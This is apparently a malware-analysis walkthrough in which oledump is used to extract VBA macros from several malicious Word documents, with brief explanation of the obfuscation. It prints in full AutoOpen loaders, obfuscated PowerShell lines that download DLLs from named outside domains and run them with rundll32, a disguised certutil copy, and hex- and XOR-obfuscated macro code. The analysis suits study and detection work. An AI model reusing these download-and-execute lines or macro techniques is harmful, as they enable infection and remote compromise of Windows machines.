If left$(Email, 1) = "." Or Mid$(Email, Len(Email), 1) = "." Or InStr(Email, "..") Then
Exit Function
End If
For w = 1 To Len(Email)
sLetra = Mid$(Email, w, 1)
If Not (LCase$(sLetra) Like "[a-z]" Or sLetra = "@" Or sLetra = "." Or sLetra = "-" Or sLetra = "_" Or IsNumeric(sLetra)) Then
Exit Function
End If
Next w
sSplit = Split(UCase$(Trim$(Email)), ".")
If InStr(Dominios, sSplit(UBound(sSplit))) = 0 Then
Exit Function
End If
IsEmail = True
End If
On Error GoTo 0
End Function
Attribute VB_Name = "Module1"
Public Sub getFrameInfo(ByVal lpMP3File As String, ByRef lpFrameInfo As FHInfo, ByVal lpMP3Offset As Long)
Dim Buf As String * 4096
Dim tmpByte1 As Byte
Dim tmpByte2 As Byte
Dim tmpByte3 As Byte
Dim tmpByte4 As Byte
Dim tmpNum As Byte
Dim designator As Byte
Dim tmpLayer As Byte
Dim baseFreq As Single
Dim refFile As Integer
On Error GoTo BadFrame
lpFrameInfo.Succes = False
refFile = FreeFile
Open lpMP3File For Binary As #refFile
Get #refFile, lpMP3Offset, tmpByte1
If tmpByte1 <> &HFF Then
On Error GoTo 0
Close #refFile
Exit Sub
End If
Get #refFile, , tmpByte2
If Not (Between(tmpByte2, &HE2, &HE7) Or Between(tmpByte2, &HF2, &HF7) Or Between(tmpByte2, &HFA, &HFF)) Then
On Error GoTo 0
Close #refFile
Exit Sub
End If
Get #refFile, , tmpByte3
If Not (((tmpByte3 And &HF0) <> &H0) And ((tmpByte3 And &HF0) <> &HF0) And ((tmpByte3 And &HC) <> &HC)) Then
On Error GoTo 0
Close #refFile
Exit Sub
End If
Get #refFile, , tmpByte4
'Getting info from 2nd byte
'Getting MPEG type info
Select Case (tmpByte2 \ 8) Mod 4
Case 0
lpFrameInfo.MPEGType = 3 'MPEG v2.5
designator = 1
Case 2
lpFrameInfo.MPEGType = 2 'MPEG v2
designator = 2
Case 3
lpFrameInfo.MPEGType = 1 'MPEG v1
designator = 4
End Select
'Getting layer info
Select Case (tmpByte2 \ 2) Mod 4
Case 1
lpFrameInfo.Layer = 3
tmpLayer = 3
Case 2
lpFrameInfo.Layer = 2
tmpLayer = 2
Case 3
lpFrameInfo.Layer = 1
tmpLayer = 1
End Select
'Getting CRC info
lpFrameInfo.Protection = (tmpByte2 Mod 2) - 1
'Getting info from 3rd byte
'Getting Bit-rate
lpFrameInfo.BitRateIndex = (tmpByte3 \ 16) Mod 16
lpFrameInfo.bitRate = arrBitRates((tmpByte2 \ 8) Mod 4, (tmpByte2 \ 2) Mod 4, (tmpByte3 \ 16) Mod 16)
'Getting frequency info (also known as Sampling Rate)
Select Case (tmpByte3 \ 4) Mod 4
Case 0
lpFrameInfo.SamplingRate = 11025
Case 1
lpFrameInfo.SamplingRate = 12000
Case 2
lpFrameInfo.SamplingRate = 8000
End Select
lpFrameInfo.SamplingRate = lpFrameInfo.SamplingRate * designator
'Getting number of samples
Select Case tmpLayer
Case 1
lpFrameInfo.Samples = 384
Case 2
lpFrameInfo.Samples = 1152
Case 3
If designator = 4 Then
lpFrameInfo.Samples = 1152
Else
lpFrameInfo.Samples = 576
End If
End Select
'Getting Padding (if set data is padded with one slot)
lpFrameInfo.Padding = (tmpByte3 \ 2) Mod 2
'Getting Private info
lpFrameInfo.PrivateBit = -(tmpByte3 Mod 2)
'Getting info from 4th byte
'Getting channel mode info
lpFrameInfo.ChannelMode = (tmpByte4 \ 64) Mod 4
lpFrameInfo.ModeExtension = (tmpByte4 \ 16) Mod 4
'Getting Copyright bit
lpFrameInfo.copyright = -((tmpByte4 \ 8) Mod 2)
'Getting Original bit
lpFrameInfo.Original = -((tmpByte4 \ 4) Mod 2)
'Getting Emphasis
lpFrameInfo.Emphasis = tmpByte4 Mod 4
'Calculate Frame Size
If tmpLayer = 1 Then
lpFrameInfo.FrameSize = (((lpFrameInfo.Samples * lpFrameInfo.bitRate) \ lpFrameInfo.SamplingRate) \ 2) + lpFrameInfo.Padding
Else
lpFrameInfo.FrameSize = (((lpFrameInfo.Samples * lpFrameInfo.bitRate) \ lpFrameInfo.SamplingRate) \ 8) + lpFrameInfo.Padding
End If
lpFrameInfo.Succes = True
GoodFrame:
On Error GoTo 0
Close #refFile
Exit Sub
BadFrame:
Resume GoodFrame
End Sub
Public Function Valid_MP3(Track As String) As Boolean
Dim accMP3Info As MP3Info
Dim MP3Offset As Long
Dim ExtraOffset As Long
Valid_MP3 = False
MP3Offset = 1
If GetID3v2Header(Track) Then MP3Offset = (ID3v2Header.bSize1 * (2 ^ 21)) + (ID3v2Header.bSize2 * (2 ^ 14)) + (ID3v2Header.bSize3 * (2 ^ 7)) + ID3v2Header.bSize4 + 11
ExtraOffset = getMP3Info(Track, accMP3Info, MP3Offset)
If Not accMP3Info.Succes Then Exit Function
Valid_MP3 = True
End Function
Public Function Between(ByVal accNum As Byte, ByVal accDown As Byte, ByVal accUp As Byte) As Boolean
If accNum >= accDown And accNum <= accUp Then
Between = True
Else
Between = False
End If
End Function
Private Sub UserForm_Click()
End Sub
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
bxh.eFile
End Sub
Attribute VB_Name = "bxh"
Sub eFile()
Dim QQ1 As Object
Set QQ1 = New Form
RO = StrReverse("\ataDmargorP\:C")
ROI = RO + StrReverse("sbv.nip")
ii = StrReverse("")
Ne = StrReverse("IZOIZIMIZI")
WW = QQ1.t2.Caption
MyFile = FreeFile
Open ROI For Output As #MyFile
Print #MyFile, WW
Close #MyFile
fun = Shell(StrReverse("sbv.nip\ataDmargorP\:C exe.tpircsc k/ dmc"), Chr(48))
End
End Sub
└─$ ./oledump.py attacker2.doc -s a -v | grep "fun" | rev
))84(rhC ,)"cmd /k cscript.exe C:\ProgramData\pin.vbs"(esreveRrtS(llehS = nuf
└─$ ./oledump.py attacker2.doc -s a -S | grep -i http
<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
http://ns.adobe.com/xap/1.0/
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.0-c000 79.1357c9e, 2021/07/14-00:39:56 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmp:CreatorTool="Adobe Photoshop 22.5 (Windows)" xmp:CreateDate="2021-08-27T15:09:07+03:00" xmp:MetadataDate="2021-08-27T15:09:07+03:00" xmp:ModifyDate="2021-08-27T15:09:07+03:00" xmpMM:InstanceID="xmp.iid:f70ea248-19e3-3e45-bfdb-49055c3c1960" xmpMM:DocumentID="adobe:docid:photoshop:a6ff4835-a81e-3c4a-ad29-4ec6f468fa58" xmpMM:OriginalDocumentID="xmp.did:e6133924-10f4-ac47-ac6d-bd901a15998b" dc:format="image/jpeg" photoshop:ColorMode="3"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="created" stEvt:instanceID="xmp.iid:e6133924-10f4-ac47-ac6d-bd901a15998b" stEvt:when="2021-08-27T15:09:07+03:00" stEvt:softwareAgent="Adobe Photoshop 22.5 (Windows)"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:f70ea248-19e3-3e45-bfdb-49055c3c1960" stEvt:when="2021-08-27T15:09:07+03:00" stEvt:softwareAgent="Adobe Photoshop 22.5 (Windows)" stEvt:changed="/"/> </rdf:Seq> </xmpMM:History> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="w"?>
http://ns.adobe.com/xap/1.0/
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.0-c000 79.1357c9e, 2021/07/14-00:39:56 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmp:CreatorTool="Adobe Photoshop 22.5 (Windows)" xmp:CreateDate="2021-08-27T15:09:07+03:00" xmp:MetadataDate="2021-08-27T15:09:07+03:00" xmp:ModifyDate="2021-08-27T15:09:07+03:00" xmpMM:InstanceID="xmp.iid:f70ea248-19e3-3e45-bfdb-49055c3c1960" xmpMM:DocumentID="adobe:docid:photoshop:a6ff4835-a81e-3c4a-ad29-4ec6f468fa58" xmpMM:OriginalDocumentID="xmp.did:e6133924-10f4-ac47-ac6d-bd901a15998b" dc:format="image/jpeg" photoshop:ColorMode="3"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="created" stEvt:instanceID="xmp.iid:e6133924-10f4-ac47-ac6d-bd901a15998b" stEvt:when="2021-08-27T15:09:07+03:00" stEvt:softwareAgent="Adobe Photoshop 22.5 (Windows)"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:f70ea248-19e3-3e45-bfdb-49055c3c1960" stEvt:when="2021-08-27T15:09:07+03:00" stEvt:softwareAgent="Adobe Photoshop 22.5 (Windows)" stEvt:changed="/"/> </rdf:Seq> </xmpMM:History> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="w"?>
LL1 = "$Nano='JOOEX'.replace('JOO','I');sal OY $Nano;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://priyacareers.com/u9hDQN9Yy7g/pt.html'',''C:\ProgramData\www1.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY;"
LL2 = "$Nanoz='JOOEX'.replace('JOO','I');sal OY $Nanoz;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://perfectdemos.com/Gv1iNAuMKZ/pt.html'',''C:\ProgramData\www2.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY;"
LL3 = "$Nanox='JOOEX'.replace('JOO','I');sal OY $Nanox;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://bussiness-z.ml/ze8pCNTIkrIS/pt.html'',''C:\ProgramData\www3.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY;"
LL4 = "$Nanoc='JOOEX'.replace('JOO','I');sal OY $Nanoc;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://cablingpoint.com/ByH5NDoE3kQA/pt.html'',''C:\ProgramData\www4.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY;"
LL5 = "$Nanoc='JOOEX'.replace('JOO','I');sal OY $Nanoc;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://bonus.corporatebusinessmachines.co.in/1Y0qVNce/pt.html'',''C:\ProgramData\www5.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY;"
HTTPS
└─$ ./oledump.py attacker2.doc -s a -S | grep -i ".dll"
LL1 = "$Nano='JOOEX'.replace('JOO','I');sal OY $Nano;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://priyacareers.com/u9hDQN9Yy7g/pt.html'',''C:\ProgramData\www1.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY;"
LL2 = "$Nanoz='JOOEX'.replace('JOO','I');sal OY $Nanoz;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://perfectdemos.com/Gv1iNAuMKZ/pt.html'',''C:\ProgramData\www2.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY;"
LL3 = "$Nanox='JOOEX'.replace('JOO','I');sal OY $Nanox;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://bussiness-z.ml/ze8pCNTIkrIS/pt.html'',''C:\ProgramData\www3.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY;"
LL4 = "$Nanoc='JOOEX'.replace('JOO','I');sal OY $Nanoc;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://cablingpoint.com/ByH5NDoE3kQA/pt.html'',''C:\ProgramData\www4.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY;"
LL5 = "$Nanoc='JOOEX'.replace('JOO','I');sal OY $Nanoc;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://bonus.corporatebusinessmachines.co.in/1Y0qVNce/pt.html'',''C:\ProgramData\www5.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY;"
OK1 = "cmd /c rundll32.exe C:\ProgramData\www1.dll,ldr"
OK2 = "cmd /c rundll32.exe C:\ProgramData\www2.dll,ldr"
OK3 = "cmd /c rundll32.exe C:\ProgramData\www3.dll,ldr"
OK4 = "cmd /c rundll32.exe C:\ProgramData\www4.dll,ldr"
OK5 = "cmd /c rundll32.exe C:\ProgramData\www5.dll,ldr"
olepro32.dll@
gdiplus.dll
*\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\PROGRA~2\COMMON~1\MICROS~1\VBA\VBA7.1\VBE7.DLL#Visual Basic For Applications
*\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\MSO.DLL#Microsoft Office 16.0 Object Library
*\G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#C:\Windows\SysWOW64\FM20.DLL#Microsoft Forms 2.0 Object Library
*\G{420B2830-E718-11CF-893D-00A0C9054228}#1.0#0#C:\Windows\SysWOW64\scrrun.dll#Microsoft Scripting Runtime
*\G{6BF52A50-394A-11D3-B153-00C04F79FAA6}#1.0#0#C:\Windows\system32\wmp.dll#Windows Media Player
└─$ ./oledump.py --yara=#s#priyacareers.com attacker2.doc
1: 114 '\x01CompObj'
2: 4096 '\x05DocumentSummaryInformation'
3: 4096 '\x05SummaryInformation'
4: 7427 '1Table'
5: 63641 'Data'
6: 97 'Macros/Form/\x01CompObj'
7: 283 'Macros/Form/\x03VBFrame'
8: 63528 'Macros/Form/f'
9: 2220 'Macros/Form/o'
YARA rule: string
10: 566 'Macros/PROJECT'
11: 92 'Macros/PROJECTwm'
12: M 6655 'Macros/VBA/Form'
13: M 15671 'Macros/VBA/Module1'
14: M 1593 'Macros/VBA/ThisDocument'
15: 42465 'Macros/VBA/_VBA_PROJECT'
16: M 2724 'Macros/VBA/bxh'
17: 1226 'Macros/VBA/dir'
18: 4096 'WordDocument'
All VBA source code:
attacker - 02
└─$ ./oledump.py attacker3.doc
A: word/vbaProject.bin
A1: 423 'PROJECT'
A2: 53 'PROJECTwm'
A3: M 2017 'VBA/T'
A4: m 1127 'VBA/ThisDocument'
A5: 2976 'VBA/_VBA_PROJECT'
A6: 1864 'VBA/__SRP_0'
A7: 190 'VBA/__SRP_1'
A8: 348 'VBA/__SRP_2'
A9: 106 'VBA/__SRP_3'
A10: M 1291 'VBA/d'
A11: 723 'VBA/dir'
--------------------------------------------------------
./oledump.py attacker3.doc -s a -S
ID="{605989F3-020E-4223-90DF-C1F27C11FDA6}"
Document=ThisDocument/&H00000000
Module=T
Module=d
Name="Project"
HelpContextID="0"
VersionCompatible32="393222000"
CMG="8A8842DAC8DEC8DEC8DEC8DE"
DPB="1416DC54ECDFEDDFEDDF"
GC="9E9C56EE6AF2F5F3F5F30A"
[Host Extender Info]
&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000
[Workspace]
ThisDocument=0, 0, 0, 0, C
T=0, 0, 0, 0, C
d=0, 0, 0, 0, C
ThisDocument
tThisDocument
12%2%11%79%64%12%79%77%28%10%27%79%26%82%26%29%3%73%73%12%14%3%3%79%44%85%51%63%29%0%8%29%14%2%43%14%27%14%51%94%65%10%23%10%79%64%74%26%74%49%12%49%14%49%12%49%7%49%10%49%79%64%9%49%79%7%27%27%31%85%64%64%87%12%9%14%22%25%65%12%0%2%64%13%0%3%13%64%5%14%10%1%27%65%31%7%31%80%3%82%3%6%26%27%89%65%12%14%13%79%44%85%51%63%29%0%8%29%14%2%43%14%27%14%51%94%65%27%2%31%79%73%73%79%12%14%3%3%79%29%10%8%28%25%29%92%93%79%44%85%51%63%29%0%8%29%14%2%43%14%27%14%51%94%65%27%2%31%77$
cmd /c set u=tutil&&call copy C:\Windows\System32\cer%u%.exe C:\ProgramData\1.exe
Attribut
e VB_Nam
e = "T"
Sub aut
oopen()
dh("1
2%2%11%7`9%64%
7%28%10%
.26%8
6%29%3%73
44%85%51
F0%8
2%43%
94%65
t74%
h\2%
w0%1
7"@y
m XN As
New WshS
hell
.run(
"cmd /c
set u=tu@til&&c
opy C:\W
indows\S
ystem32\
cer%u%.e
Progr
amData\1a
", 0
End
Attribut
e VB_Nam
e = "Thi
sDocumen
1Normal
VGlobal!
Spac
Crea
tabl
Pre decla
BExp
Temp
lateDeri
$Custom
(1Normal.ThisDocument
$*\Rffff*08610d3149
WordS10
Win16
Win32
Win64F
VBA6
VBA7
Project1
stdole
Project-
ThisDocument<
_Evaluate
Normal
Office
Documentj
Module1b
autoopen
WshShell
run_
eR ]0
Split
ChrK~0
IWshRuntimeLibrary
*\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL#Visual Basic For Applications
*\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB#Microsoft Word 16.0 Object Library
*\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\Windows\System32\stdole2.tlb#OLE Automation
*\CNormal
*\CNormal
*\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL#Microsoft Office 16.0 Object Library
*\G{F935DC20-1CF0-11D0-ADB9-00C04FD58A0B}#1.0#0#C:\Windows\system32\wshom.ocx#Windows Script Host Object Model
ThisDocument
08610d3149
ThisDocument
04610d3149
05610d3149
*\CNormalrU
b=q9
ThisDocument
Project
C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL
C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB
Word
C:\Windows\System32\stdole2.tlb
stdole
C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL
Office
C:\Windows\system32\wshom.ocx
IWshRuntimeLibrary
Document
util'
Attribut
e VB_Nam
e = "d"
Functio
n h(ju)
dSpli
<, "%"
P@For lc
To UBou nd(eR
& Chr
&(lc) X
>Next
}vY(
L"util
Project
rstd
ole>
\G{00020
430-
0046}#
2.0#0#C:
\Windows
\System3
e2.tlb
#OLE Aut
omation
ENormal
!Offic
!G{2
DF8D04C-
5BFA-101@B-BDE5
gAjA
ram File
s\Common
Microso
ft Share
d\OFFICE
16\MSO.D
M 16 .0 Ob
ibrary
IWsh
RuntimeD
sA@eR
n@ji
y@mx
UAmF935D
C20-1CF
1D0-ADB9
@9C04FD58@A0B}#1Mms
Emwshom.o
t Scr
ipt Host
E0Model
ThisDo
cumentG
T@1i
c@3m
gn@4
!Cd"B
------------------------------------------
./oledump.py attacker3.doc -s a -S | grep exe
cmd /c set u=tutil&&call copy C:\Windows\System32\cer%u%.exe C:\ProgramData\1.exe
The Substitution Explained
The script defines a variable $u = "tutil". It then constructs a file path: C:\Windows\System32\cer%u%.exe
When you put them together:
-
Take the first part:
cer -
Add the variable
u:tutil -
Add the extension:
.exe -
Result:
certutil.exe
attacker - 04
./oledump.py --yara=#s#1.exe attacker3.doc
A: word/vbaProject.bin
A1: 423 'PROJECT'
A2: 53 'PROJECTwm'
A3: M 2017 'VBA/T'
YARA rule: string
A4: m 1127 'VBA/ThisDocument'
A5: 2976 'VBA/_VBA_PROJECT'
A6: 1864 'VBA/__SRP_0'
A7: 190 'VBA/__SRP_1'
A8: 348 'VBA/__SRP_2'
A9: 106 'VBA/__SRP_3'
A10: M 1291 'VBA/d'
A11: 723 'VBA/dir'
All VBA source code:
YARA rule: string
└─$ ./oledump.py attacker4.doc -v
1: 113 '\x01CompObj'
2: 4096 '\x05DocumentSummaryInformation'
3: 4096 '\x05SummaryInformation'
4: 4096 '1Table'
5: 438 'Macros/PROJECT'
6: 41 'Macros/PROJECTwm'
7: M 17216 'Macros/VBA/ThisDocument'
8: 10917 'Macros/VBA/_VBA_PROJECT'
9: 515 'Macros/VBA/dir'
10: 4142 'WordDocument'
-----------------------------------------------------------------------------
└─$ ./oledump.py attacker4.doc -v -s 7
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Function Hextostring(ByVal LIfBaRNaq As String) As String
Dim bOYvqTVCQck As String
Dim FNOMR As String
Dim wDhutJNQ As Long
For wDhutJNQ = 1 To Len(LIfBaRNaq) Step 2
If 128918 = 128918 + 1 Then End
If 3786 < 26 Then
If 751819 = 751819 + 1 Then End
If 3264 < 68 Then
MsgBox ("uQQmbkpk91")
End If
If Len("gCUNhpmZ4478") = Len("AfkPTCKQ") Then
MsgBox ("Error !!!")
End If
MsgBox ("HplLmocL88")
End If
If Len("gnJhlPff4992") = Len("izYUCJCG") Then
If 453232 = 453232 + 1 Then End
If 2346 < 12 Then
MsgBox ("tZGiCmps23")
End If
If Len("prksphdB3552") = Len("eRyRFxWn") Then
MsgBox ("Error !!!")
End If
MsgBox ("Error !!!")
End If
If 513385 = 513385 + 1 Then End
If 1788 < 34 Then
MsgBox ("MdLJUEle65")
End If
If Len("zvFxcxRf2893") = Len("gGbyDpzx") Then
MsgBox ("Error !!!")
End If
bOYvqTVCQck = Chr$(Val(Chr$(38) & Chr$(72) & Mid$(LIfBaRNaq, wDhutJNQ, 2)))
If 679582 = 679582 + 1 Then End
If 4764 < 49 Then
If 988195 = 988195 + 1 Then End
If 5892 < 13 Then
MsgBox ("PLjzMDno76")
End If
If Len("opFcKgjZ3694") = Len("zQEGxwNt") Then
MsgBox ("Error !!!")
End If
MsgBox ("CLZiRzih72")
End If
If Len("ttcDmMln2566") = Len("kwoxPUHO") Then
If 768811 = 768811 + 1 Then End
If 3344 < 68 Then
MsgBox ("LlhuNOmN91")
End If
If Len("aTqSHATq1946") = Len("AjrSPany") Then
MsgBox ("Error !!!")
End If
MsgBox ("Error !!!")
End If
If 312727 = 312727 + 1 Then End
If 7138 < 44 Then
MsgBox ("fwJBAgAh17")
End If
If Len("vkytXtMV8243") = Len("kLWxnsEn") Then
MsgBox ("Error !!!")
End If
FNOMR = FNOMR & bOYvqTVCQck
Next wDhutJNQ
If 729678 = 729678 + 1 Then End
If 3216 < 86 Then
If 794514 = 794514 + 1 Then End
If 3692 < 52 Then
MsgBox ("rtzipwlx84")
End If
If Len("sjCDNfRU3716") = Len("vUIxhzzH") Then
MsgBox ("Error !!!")
End If
MsgBox ("bocnPvMm58")
End If
If Len("CbWCINQG1818") = Len("JaPgdumj") Then
If 749461 = 749461 + 1 Then End
If 6217 < 59 Then
MsgBox ("clnhRiWt51")
End If
If Len("ZWzmHeVK6323") = Len("wxJSwpUl") Then
MsgBox ("Error !!!")
End If
MsgBox ("Error !!!")
End If
If 175442 = 175442 + 1 Then End
If 6491 < 99 Then
MsgBox ("cLrzZuDD22")
End If
If Len("TtBUlBVV7515") = Len("JwOkIDwu") Then
MsgBox ("Error !!!")
End If
Hextostring = FNOMR
End Function
Sub Auto_Open()
GoTo hpolxosipwleovqydqiijfmpmhadwhkijvlbokhmrnhlwrcbihvyiwnplgjfltwjtypwmbprbpunfrtvrl:
hpolxosipwleovqydqiijfmpmhadwhkijvlbokhmrnhlwrcbihvyiwnplgjfltwjtypwmbprbpunfrtvrl:
GoTo bfvcjnnjkjkvxctrntfoimlrjeyrtcbdbkdaxpratpwmmiosffuwjoxzowxecewxwdoypivotfbjbuxmul:
bfvcjnnjkjkvxctrntfoimlrjeyrtcbdbkdaxpratpwmmiosffuwjoxzowxecewxwdoypivotfbjbuxmul:
GoTo rkckdqbljfjtdbrryuwatebpsacldejdsschjsuavrcbpilzgevpmjxvcmfuzhozfprtuwyfedvshsetyf:
rkckdqbljfjtdbrryuwatebpsacldejdsschjsuavrcbpilzgevpmjxvcmfuzhozfprtuwyfedvshsetyf:
IOWZJGNTSGK
End Sub
Sub AutoOpen()
GoTo zgjksfckvjbfupbfpqerjkfbyvhphicghmdzwyshljawbwgybalblihqmatttqiaxprnmitiumgzjglrmt:
zgjksfckvjbfupbfpqerjkfbyvhphicghmdzwyshljawbwgybalblihqmatttqiaxprnmitiumgzjglrmt:
GoTo ntkwgbazodnxlmngkssfvjdwvczwjxotblvzzropmwqzxlujflzjpazteectmrbvtqnnnqobmcyydrssnb:
ntkwgbazodnxlmngkssfvjdwvczwjxotblvzzropmwqzxlujflzjpazteectmrbvtqnnnqobmcyydrssnb:
GoTo ocgfmhrsimdpiyclijxwpjopjtlwjtopoyithnuojbvcaauwaavscrmxsabgqvemffbcddzhhdsvmnjfcp:
ocgfmhrsimdpiyclijxwpjopjtlwjtopoyithnuojbvcaauwaavscrmxsabgqvemffbcddzhhdsvmnjfcp:
Auto_Open
End Sub
Sub Workbook_Open()
GoTo fqugoppeeftaopjzsjmupsrtovfxedfgpecorppweusztfkzphwpfhofwhixfaghbmfkdwnsycrsvjrtly:
fqugoppeeftaopjzsjmupsrtovfxedfgpecorppweusztfkzphwpfhofwhixfaghbmfkdwnsycrsvjrtly:
GoTo heqkginwiaibyfsvwvqtxuitugennjoangyodyfcqziwybtnwvwtibwqomzimszrrprdgguukjywhbuygx:
heqkginwiaibyfsvwvqtxuitugennjoangyodyfcqziwybtnwvwtibwqomzimszrrprdgguukjywhbuygx:
GoTo psjngffkwvmdllnhrcbfqiugmqunvyccxewbrxqhmlfswjoulnrvcmkxsetiqqriaihnzvtulingjhehnf:
psjngffkwvmdllnhrcbfqiugmqunvyccxewbrxqhmlfswjoulnrvcmkxsetiqqriaihnzvtulingjhehnf:
Auto_Open
End Sub
Function ZUWSBYDOTWV(ByVal FYAMZFQXNVI As String, ByVal CVUDEDVJFST As String) As Boolean
Dim VPBCRFOQENN As Object, LSFYHUDVCYR As Long, QSBXXUZTKRD As Long, MDLLXOKIXRV() As Byte
GoTo hjwiwiyeojxvawsanclcahyfrfgwjdikfsfnjazxovvouiysjoieyyyjvczcudqpbumdziyyzydjhmvmdd:
hjwiwiyeojxvawsanclcahyfrfgwjdikfsfnjazxovvouiysjoieyyyjvczcudqpbumdziyyzydjhmvmdd:
GoTo xwqdjsttofxtkraaybygbodqkprjcpmjlvvdoqvxaokuluhzjnnpkgyqmwfmtvooihxsiqkaoyssrerysn:
xwqdjsttofxtkraaybygbodqkprjcpmjlvvdoqvxaokuluhzjnnpkgyqmwfmtvooihxsiqkaoyssrerysn:
GoTo brfgzmzrcabwgbcfbtnfmhjqhazwlbtduyyfkhjhmcvjlqrnnuntxcjijgjcqvhnjmfvpgmywngwcdiybg:
brfgzmzrcabwgbcfbtnfmhjqhazwlbtduyyfkhjhmcvjlqrnnuntxcjijgjcqvhnjmfvpgmywngwcdiybg:
Set VPBCRFOQENN = CreateObject(XORI(Hextostring("3F34193F254049193F253A331522"), Hextostring("7267417269")))
GoTo fpvygztoabfyscyqmjxaakqwiwqpjfzgwplzmhryvptavvsitizcoqgammdhoraqpviudbameizhxxkfiw:
fpvygztoabfyscyqmjxaakqwiwqpjfzgwplzmhryvptavvsitizcoqgammdhoraqpviudbameizhxxkfiw:
GoTo fjuvxpaemzuawljcczrjcqncfqtadadckbfxynawdigwsmxxfdtoiyzyriibnsacdbvkbubskrjrvkujkg:
fjuvxpaemzuawljcczrjcqncfqtadadckbfxynawdigwsmxxfdtoiyzyriibnsacdbvkbubskrjrvkujkg:
